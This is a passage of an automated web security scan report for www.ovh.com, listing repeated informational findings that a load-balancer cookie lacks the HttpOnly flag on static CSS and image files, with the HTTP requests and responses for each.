The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/index.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "2a0f7e-5022-49cdcb8267114"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:26 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 22 Feb 2011 10:48:23 GMT
Content-Type: text/css
Content-Language: fr
Content-Length: 20514

/* CSS document */

/* ========== Index2009 styles ========== */

div.sub-ind {
background: #f2f2f2 url('../../images/index/sub-ind-bg.jpg') no-repeat 0 0;
}

div.sub-ind div.bottom {
displa
...[SNIP]...

3.68. http://www.ovh.com/fr/themes/10/main/bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "11860c-585c-4882b4cbd39af"
Accept-Ranges: bytes
Content-Length: 22620
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3497
Content-Type: image/jpeg

......JFIF.....H.H.....C......................    ....
   ..


.......

................................................................4.....................!..1AQ."2aq...B..R#..3b..CS..........?....l=.
...[SNIP]...

3.69. http://www.ovh.com/fr/themes/10/main/body-top.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/body-top.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/body-top.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118618-10f4-4882b4cbdfcf5"
Accept-Ranges: bytes
Content-Length: 4340
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 747
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

..........................,.......................................<.......................U........!16u..#ARqs3Qbr."7B.$&2a5E......
...[SNIP]...

3.70. http://www.ovh.com/fr/themes/10/main/head-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/head-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/head-bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "11860a-29d6-4882b4cbd17d6"
Accept-Ranges: bytes
Content-Length: 10710
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 745
Content-Type: image/jpeg

......JFIF.....#.#.....C......................    ....
   ..


.......

................................................................1.....................!..1A.."2Qaq.B...R.#3...bC........?..I.......
...[SNIP]...

3.71. http://www.ovh.com/fr/themes/10/main/home.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/home.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/home.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118604-240-4882b4cbcb404"
Accept-Ranges: bytes
Content-Length: 576
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:37 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a..(..T.fffgggiiijjjkkklllmmmnnnoooppprrrwwwxxx|||}}}...........................................................................................................................................
...[SNIP]...

3.72. http://www.ovh.com/fr/themes/10/main/hr.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/hr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/hr.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "11861a-126-4882b4cbe1d27"
Accept-Ranges: bytes
Content-Length: 294
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:37 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a.....!.]]]........................................................................................................................................................................................
...[SNIP]...

3.73. http://www.ovh.com/fr/themes/10/main/logo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/logo.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "1185f8-1bd1-4882b4cbbef40"
Accept-Ranges: bytes
Content-Length: 7121
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3498
Content-Type: image/jpeg

......JFIF.....#.#.....C......................    ....
   ..


.......

.......................C.............
.........................................................4.L.................................
...[SNIP]...

3.74. http://www.ovh.com/fr/themes/10/main/menu-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/menu-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/menu-bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118614-1572-4882b4cbdbcb5"
Accept-Ranges: bytes
Content-Length: 5490
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3500
Content-Type: image/jpeg

......JFIF.....#.#.....C......................    ....
   ..


.......

..........................6.......................................G........................a...Q.!1V.....F...6ABq."2..v..#$Rfs...3C
...[SNIP]...

3.75. http://www.ovh.com/fr/themes/10/main/section-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/section-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/section-bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118612-797-4882b4cbd9bed"
Accept-Ranges: bytes
Content-Length: 1943
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:40:21 GMT
Age: 1825
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

..........................(.................................    ...6.....    .............a....V...........!A1...#Qq"$&3Bc.........?..A..
...[SNIP]...

3.76. http://www.ovh.com/fr/themes/10/main/subsection-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/subsection-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/subsection-bg.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118610-39a-4882b4cbd7b2e"
Accept-Ranges: bytes
Content-Length: 922
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:47 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a..................................

............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

3.77. http://www.ovh.com/fr/themes/10/main/tools.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/main/tools.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/main/tools.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "1185fa-31a-4882b4cbc0ff7"
Accept-Ranges: bytes
Content-Length: 794
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:36 GMT
Content-Type: image/jpeg
Content-Language: fr

......JFIF.....#.#.....C......................    ....
   ..


.......

.................................................................)........................1!AQaq2...."B..........?..eA....KI...(...
...[SNIP]...

3.78. http://www.ovh.com/fr/themes/10/mainMenuBigTop.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/mainMenuBigTop.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/mainMenuBigTop.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118680-2c5-4882b4cc24d18"
Accept-Ranges: bytes
Content-Length: 709
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:47 GMT
Content-Type: image/jpeg
Content-Language: fr

......JFIF.....v.v.....C......................    ....
   ..


.......

..........................U...............................    ...(.........................6Uu.....!."1Q........?..%........'....o.C.
...[SNIP]...

3.79. http://www.ovh.com/fr/themes/10/mainMenuBottom.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/mainMenuBottom.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/mainMenuBottom.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118690-1f6-4882b4cc33b8a"
Accept-Ranges: bytes
Content-Length: 502
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:56 GMT
Content-Type: image/jpeg
Content-Language: fr

......JFIF.....v.v.....C......................    ....
   ..


.......

..........................
...............................    ...(.......................Ua.......!...2.........?..O.......#...q;.p"2.
...[SNIP]...

3.80. http://www.ovh.com/fr/themes/10/mainMenuTop.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/mainMenuTop.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/mainMenuTop.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "11868e-1ce-4882b4cc31c58"
Accept-Ranges: bytes
Content-Length: 462
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:10:56 GMT
Content-Type: image/jpeg
Content-Language: fr

......JFIF.....v.v.....C......................    ....
   ..


.......

..........................
...............................    ...).........................U...!...6u."1Q........?...Y....MPYM.P.P....
...[SNIP]...

3.81. http://www.ovh.com/fr/themes/10/products.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/products.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/products.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "2a7489-1f764-49d6b13558c8a"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:33 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 01 Mar 2011 12:38:38 GMT
Content-Type: text/css
Content-Language: fr
Content-Length: 128868

/* css document */

/* ========== Common styles ========== */

ul { margin-left: 10px; margin-bottom: 5px; }

ul.blue li {
list-style-image: url('../../themes/default/images/shared/listImage.gif')
...[SNIP]...

3.82. http://www.ovh.com/fr/themes/10/server.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/server.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/server.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "118678-d09-4882b4cc1db8a"
Accept-Ranges: bytes
Content-Length: 3337
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:06 GMT
Age: 1784
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.........................................................H...................................
...[SNIP]...

3.83. http://www.ovh.com/fr/themes/10/share.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/share.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/share.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
ETag: "2b8c63-2bcb-49ce16a9e6100"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:15:26 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 22 Feb 2011 16:24:37 GMT
Content-Type: text/css
Content-Language: fr
Content-Length: 11211

/* CSS Document */

body {
background : #eaeaea url('../../themes/10/main/bg.jpg') repeat-x 0 0;
margin : 0px;
text-align : center;
border-top: 1px solid #a5a5a5;
}

* {
font-fami
...[SNIP]...

3.84. http://www.ovh.com/fr/themes/10/table_bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/themes/10/table_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/themes/10/table_bg.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/produits/offres_dedies.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "1186ba-410e-4882b4cc5c603"
Accept-Ranges: bytes
Content-Length: 16654
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:41:07 GMT
Age: 1788
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.85. http://www.ovh.com/fr/themes/default/images/blue/logos/sd_bsd.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
